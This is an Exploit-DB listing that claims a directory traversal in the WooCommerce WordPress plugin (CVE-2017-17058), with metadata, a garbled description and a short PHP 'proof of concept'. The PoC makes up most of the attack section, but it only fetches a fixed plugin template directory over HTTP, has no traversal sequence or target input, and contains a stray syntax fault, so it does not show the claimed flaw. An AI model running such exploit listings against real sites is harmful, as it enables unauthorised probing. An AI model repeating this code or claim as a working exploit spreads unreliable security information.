WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal

EDB-ID: 43196
Author: Fu2x2000
Published: 2017-11-28
CVE: CVE-2017-17058
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Date: 28-11-2017 
# Software Link: https://wordpress.org/plugins/woocommerce/
# Exploit Author:fu2x2000
# Contact: [email protected]
# Website:
# CVE:2017-17058
#Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0
# Category: webapps


1. Description

Identifying woo commerce theme pluging properly sanitized against Directory
Traversal,even the latest version of WordPress with woocommerce can be
vulnerable.

2. Proof of Concept

$woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; `
function file_get_contents_utf8($fn) {
$opts = array(
'http' => array(
'method'=>"GET",
'header'=>"Content-Type: text/html; charset=utf-8"
)
);

$wp = stream_context_create($opts);
$result = @file_get_contents($fn,false,$wp);
return $result;
}
/* $head= header("Content-Type: text/html; charset=utf-8"); ; */
header("Content-Type: text/html; charset=utf-8");

$result = file_get_contents_utf8("http://".$woo);

echo $result;


Regards

Fu2x200

Related Posts